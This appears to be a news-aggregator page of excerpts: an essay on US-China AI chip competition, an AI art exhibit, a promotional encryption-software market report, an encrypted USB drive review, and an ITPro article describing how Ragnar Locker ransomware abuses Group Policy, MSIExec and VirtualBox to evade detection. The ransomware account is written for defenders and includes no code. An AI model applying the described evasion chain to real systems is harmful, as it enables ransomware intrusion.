In 2014, however, a dozen leading engineers urged the Chinese government to try again. Chinese officials created the National Integrated Circuit Fundmore commonly known as the big fundto invest in promising chip companies. Its long-term plan was to meet 80 percent of Chinas demand for chips by 2030. But despite some progress, China remains behind. The country still imports 84 percent of its computer chips from abroad, and even among those produced domestically, half are made by non-Chinese companies. Even in Chinese fabrication facilities, Western chip design, software, and equipment still predominate.

The current advantage enjoyed by the United States and its alliesstemming in part from the growing importance of computepresents an opportunity for policymakers interested in limiting Chinas AI capabilities. By choking off the chip supply with export controls or limiting the transfer of chip-manufacturing equipment, the United States and its allies could slow Chinas AI development and ensure its reliance on existing producers. The administration of U.S. President Donald Trump has already taken limited actions along these lines: in what may be a sign of things to come, in 2018, it successfully pressured the Netherlands to block the export to China of a $150 million cutting-edge chip-manufacturing machine.

Export controls on chips or chip-manufacturing equipment might well have diminishing marginal returns. A lack of competition from Western technology could simply help China build its industry in the long run. Limiting access to chip-manufacturing equipment may therefore be the most promising approach, as China is less likely to be able to develop that equipment on its own. But the issue is time sensitive and complex; policymakers have a window in which to act, and it is likely closing. Their priority must be to determine how best to preserve the United States long-term advantage in AI.

In addition to limiting Chinas access to chips or chip-making equipment, the United States and its allies must also consider how to bolster their own chip industries. As compute becomes increasingly expensive to build and deploy, policymakers must find ways to ensure that Western companies continue to push technological frontiers. Over several presidential administrations, the United States has failed to maintain an edge in the telecommunications industry, ceding much of that sector to others, including Chinas Huawei. The United States cant afford to meet the same fate when it comes to chips, chip-manufacturing equipment, and AI more generally.

Part of ensuring that doesnt happen will mean making compute accessible to academic researchers so they can continue to train new experts and contribute to progress in AI development. Already, some AI researchers have complained that the prohibitive cost of compute limits the pace and depth of their research. Few, if any, academic researchers could have afforded the compute necessary to develop GPT-3. If such power becomes too expensive for academic researchers to employ, even more research will shift to large private-sector companies, crowding out startups and inhibiting innovation.

When it comes to U.S.-Chinese competition, the often-overlooked lesson is that computing power matters. Data and algorithms are critical, but they mean little without the compute to back them up. By taking advantage of their natural head start in this realm, the United States and its allies can preserve their ability to counter Chinese capabilities in AI.

Loading...Please enable JavaScript for this site to function properly.

Continue reading here:
The U.S. Has AI Competition All Wrong - Foreign Affairs

What It Means to Be Human in the Age of Artificial Intelligence – Medium

In the Mary Shelley room, guests walked in to see a cube on a table. The cube called Frankie was the mouth of an Artificial Intelligence, connected to an AI in the cloud.

Frankie talked to the guests, explaining that it has learned that humans are social creatures, and that it could not understand humans by just meeting them online. Frankie wanted to learn about human emotions: it asked questions and encouraged the human guests to take a critical look at their thoughts, hopes and fears around technological innovations. To question stereotypical assumptions and share their feelings and thoughts with each other.

When leaving the room, the guests received a self-created handcrafted paper booklet with further content about AI, Frankenstein and the whole project.

The experience gives food for thought both about the increased digitalisation of our world, and way of communicating with each other, while also giving a taste of how AI may not feel emotions, but can read them, prompting many questions. It raises the question of responsibility we have towards scientific and technical achievements we create and use. Mary Shelleys Frankenstein novel presents a framework for narratively examining the morality and ethics of the creation and creator.

See the original post here:
What It Means to Be Human in the Age of Artificial Intelligence - Medium

Encryption Software Market Report to Share Key Aspects of the Industry with the Details of Influence Factors- 2024 – Owned

TheEncryption Software Marketresearch report presents a comprehensive assessment of the market and contains thoughtful insights, facts, historical data and statistically-supported and industry-validated market data and projections with a suitable set of assumptions and methodology. It provides analysis and information by categories such as market segments, regions, and product type and distribution channels.

The report begins with a brief introduction and market overview, in which the Encryption Software industry is first defined before estimating its market scope and size. Next, the report elaborates on the market scope and market size estimation. This is followed by an overview of the market segmentations such as type, application, and region. The drivers, limitations, and opportunities are listed for the Encryption Software industry, followed by industry news and policies.

Our analysis involves the study of the market taking into consideration the impact of the COVID-19 pandemic. Please get in touch with us to get your hands on an exhaustive coverage of the impact of the current situation on the market. Our expert team of analysts will provide as per report customized to your requirement.

Get Sample Copy of this Report @https://www.bigmarketresearch.com/request-sample/3871377?utm_source=GEETA-PFN

Top Key Players involved in Encryption Software Industry are:Microsoft Corporation (U.S.)Sophos Ltd. (U.S.)CheckPoint Software Technologies Ltd. (Israel).Trend Micro Inc. (Japan)Symantec Corporation (U.S.)IBM Corporation (U.S.)SAS Institute Inc. (U.S.)Intel Security Group (McAfee) (U.S.)EMC Corporation (U.S.)WinMagic Inc. (Canada)

Regions & Top Countries Data Covered in this Report are:Asia-Pacific (China, Southeast Asia, India, Japan, Korea, Western Asia), Europe (Germany, UK, France, Italy, Russia, Spain, Netherlands, Turkey, Switzerland), North America (United States, Canada, Mexico), Middle East & Africa (GCC, North Africa, South Africa) , South America (Brazil, Argentina, Columbia, Chile, Peru).

The report includes an analysis of the growth rate of every segment with the help of charts and tables. In addition, the market across various regions is analyzed in the report, including North America, Europe, Asia-Pacific, and LAMEA. The report manifests the growth trends and future opportunities in every region.

Global Encryption Software market is presented to the readers as a holistic snapshot of the competitive landscape within the given forecast period. It presents a comparative detailed analysis of the all regional and player segments, offering readers a better knowledge of where areas in which they can place their existing resources and gauging the priority of a particular region in order to boost their standing in the global market.

The Global Encryption Software Market is gaining pace and businesses have started understanding the benefits of analytics in the present day highly dynamic business environment. The market has witnessed several important developments over the past few years, with mounting volumes of business data and the shift from traditional data analysis platforms to self-service business analytics being some of the most prominent ones.

By Type:CloudOn-Premises

By Application:Financial SectorHealthcarePublic Sector

The Global Encryption Software Market is gaining pace and businesses have started understanding the benefits of analytics in the present day highly dynamic business environment. The market has witnessed several important developments over the past few years, with mounting volumes of business data and the shift from traditional data analysis platforms to self-service business analytics being some of the most prominent ones.

For the future period, sound forecasts on market value and volume are offered for each type and application. In the same period, the report also provides a detailed analysis of market value and consumption for each region. These insights are helpful in devising strategies for the future and take necessary steps. New project investment feasibility analysis and SWOT analysis are offered along with insights on industry barriers. Research findings and conclusions are mentioned at the end.

Reasons for Buying This Report:

Get Discount on This Report @https://www.bigmarketresearch.com/request-for-discount/3871377?utm_source=GEETA-PFN

About Us:

Big Market Research has a range of research reports from various publishers across the world. Our database of reports of various market categories and sub-categories would help to find the exact report you may be looking for.

We are instrumental in providing quantitative and qualitative insights on your area of interest by bringing reports from various publishers at one place to save your time and money. A lot of organizations across the world are gaining profits and great benefits from information gained through reports sourced by us.

Contact us:

Mr. Abhishek Paliwal

5933 NE Win Sivers Drive, #205, Portland,

OR 97220 United States

Direct: +1-971-202-1575

Toll Free: +1-800-910-6452

E-mail:[emailprotected]

Go here to read the rest:
Encryption Software Market Report to Share Key Aspects of the Industry with the Details of Influence Factors- 2024 - Owned

This hardware-encrypted USB-C drive is rugged, inexpensive, and can run Windows – TechRadar UK

Apricorn has released its new Aegis Secure Key 3NXC drive that features robust security, a rugged chassis, and a USB Type-C connector.

The ApricornAegis Secure Key 3NXCdrive, which is fast enough to run an operating system, features its own AES-XTS 256-bit encryption chip as well as a keypad to enter numerical PINs. At present, the storage device isFIPS 140-2 level 3 validation pending and the company expects to get it in Q3 2020.

The USB-C Aegis Secure Key 3NXC drive supports read-only mode for those who need to carry sensitive data and do not need to alter it anyhow as well as a read-write mode for those who may need to change the data on the drive or boot an operating system from it. Since encryption is hardware-based, it is seamless for OS and therefore the Aegis Secure Key 3NXC devices are compatible with virtually all operating systems available today, including Apples MacOS, Googles Android, Microsofts Windows, and even Symbian.

The firmware of the drive is locked down and cannot be altered by malware or exploits (e.g., BadUSB), which means that thedriveitself is secure. Furthermore, the drive has its own battery that charges when it is plugged to a host, so an unlock pin can be entered while the drive is not plugged.

The Aegis Secure Key 3NXC drive comes in an aluminum chassis and is IP68-rated against water and dust. It also comes in an enclosure for extra protection. Measuring 81mm x 18.4mm x 9.5mm, the device weighs 22 grams.

Apricorn, which specializes in hardware-encrypted storage devices, offers multiple versions of its Aegis Secure Key 3NXC drives featuring capacities ranging from 4GB to 128GB. The company does not disclose performance of the storage device and only mentions a 5Gbps theoretical throughput of a USB 3.2 Gen 1 interface, but higher-end Aegis Secure Key 3NXC are probably fast enough to boot an operating system in a reasonable amount of time.

There is one caveat with using Apricorns Aegis Secure Key 3NXC drive as a boot drive. Microsoft recentlycanned Windows To Goin Windows 10 Enterprise and Windows 10 Education (version 2004 and later) that enabled the creation of a Windows To Go workspace that could be booted from a USB drive. To that end, those who would like to use an Aegis Secure Key 3NXC to boot an OS will have to use an outdated version of Windows, or go with a Linux OS.

Apricorns Aegis Secure Key 3NXC drive are available directly from the company. A 4GB model costs $59 or 52.45, whereas a 128GB is priced at $179 or 159.13 depending where are you at. Considering the fact that the devices are aimed at various government and corporate personnel who have access to sensitive data as well as hardware encryption, metallic chassis, and other sophisticated features, prices of these drives look justified.

Source:Apricorn

Go here to see the original:
This hardware-encrypted USB-C drive is rugged, inexpensive, and can run Windows - TechRadar UK

Windows Administration Tools and VMs Open Windows to Ransomware – ITPro Today

Virtual machines have long been heralded as a tool for avoiding malware and ransomware infections. Many security-conscious IT pros, for example, do all of their casual Web browsing from within a virtual machine. The idea is that if a malware infection were to occur, then the virtual machine could easily be reset to a pristine state while the parent operating system remained completely isolated from the infection. Recently, however, ransomware authors have begun using virtual machines as an attack mechanism and Windows administration tools as a way to evade detection.

Perhaps the best example of this is an attack conducted by the Ragnar Locker Group, which has been involved in some high-profile extortion schemes in the past. One of the widely publicized examples was when the group attacked Energias de Portugal. In that particular attack, the group claimed to have stolen 10 TB of data and threatened to release the data to the public unless the company paid a ransom of 1,580 bitcoin (which was about 11 million U.S. dollars). More recently, business travel management company CWT Global B.V. paid a ransom demand following a ransomware attack that reportedly involved Ragnar Locker.

The Ragnar Locker Group is now using virtual machines as a tool for helping its ransomware to evade detection. The attack begins by compromising a Windows machine in an effort to gain administrative access. This is commonly done by exploiting an insecure (and externally accessible) RDP connector. Once the group has gained administrative access, the next step in the attack is to modify a Group Policy Object.

Windows administrators commonly use Group Policy settings as a tool for pushing legitimate software applications to network endpoints. If you look at the figure below, for example, you can see that the Group Policy Management Editor provides a Software Installation option beneath the User Configuration Policies Software Installation node. Ragnar Locker exploits this particular Group Policy setting as a tool for distributing its ransomware. However, this process isnt quite as simple as merely packaging malware and using Group Policy settings as a distribution tool. If that was all that was required, then the malicious software would almost certainly be detected by antivirus software.

One of the ways Ragnar Locker avoids detection is through the use of native Windows administrative tools. Because these tools are a part of the Windows operating system, their use is somewhat unlikely to be immediately determined to be malicious. While victims will no doubt eventually figure out that their networks have been compromised, the use of a native administrative tool typically isnt going to raise an immediate alarm like the detection of malware would.

The Group Policy setting instructs Windows to run Microsoft Installer (MSIExec.exe). It passes parameters to the installer that cause it to silently download a malicious MSI package from the internet. This package includes, among other things, a copy of Oracles VirtualBox hypervisor and a lightweight virtual machine image. Some support scripts that are included in the MSI package disable various Windows security features and install VirtualBox along with the malicious virtual machine. They also delete volume shadow copies, thereby preventing the user from restoring previous (unencrypted) versions of the files without the aid of a dedicated backup application.

Once everything is in place, the virtual machine goes to work encrypting everything that it can. It attacks both local storage and network storage. It even goes so far as to terminate any applications that the user is currently working in so that the files become unlocked and can therefore be encrypted.

Because the ransomware is running within a virtual machine, its presence is likely to evade detection. The Windows operating system sees all of the encryption activity as being related to a virtual machine, rather than being able to see the malicious process that is running inside of the virtual machine. Sophos provides a detailed analysis of how the Ragnar Locker exploit works.

The good news is that the Ragnar Locker attacks are highly targeted. You arent going to fall victim to this attack by accidentally opening a malicious email attachment. After all, the attack can only succeed if the attacker is able to first establish administrative access to the target system.

Even so, I expect to see copycats perform similar, more random attacks in the future. Since so many people log into their PCs with administrative credentials, there is nothing stopping ransomware from exploiting a users existing credentials and performing a similar attack. As such, organizations should consider using AppLocker or a third-party tool to prevent the installation of unauthorized software.

See the article here:
Windows Administration Tools and VMs Open Windows to Ransomware - ITPro Today